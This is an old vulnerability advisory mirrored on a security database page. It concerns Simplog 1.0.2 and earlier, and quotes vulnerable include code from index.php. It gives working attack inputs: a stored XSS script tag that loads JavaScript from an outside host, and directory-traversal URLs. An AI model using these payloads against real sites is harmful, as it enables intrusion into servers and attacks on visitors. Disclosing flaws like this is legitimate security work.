Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11703
HistoryMar 05, 2006 - 12:00 a.m.

Simplog <= 1.0.2 Vulnerabilities

2006-03-0500:00:00
vulners.com
73
JSON

ORIGIONAL SOURCE: http://notlegal.ws/simplogsploit.txt

——–summary
software: simplog
vendors website: http://daverave.64digits.com/home.php?page=simplog
versions: <= 1.0.2
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard and jim
risk level: medium

——– description
simplog does not sanatise blog posts allowing users to insert
html into posts causing a xss vulnerability. also, the application
uses global variables for includes allowing users to include
other .txt files than the inteded target

    in index.php:

42 $act = $_GET['act'];
43 if ($act == '')
44 {
45 include("blog.txt");
46 }
47 else
48 {
49 include("act/$act.txt");
50 }

——– exploit(s)
xss:
make any of your blog posts contain a script like below
<SCRIPT SRC=http://notlegal.ws/xss.js&gt;&lt;/SCRIPT&gt;

    directory transversal:
    http://example.com/index.php?act=blog&amp;blogid=../somefile
    http://example.com/index.php?act=../somefile

——– credit
author(s): retard and jim
email: [email protected]

JSON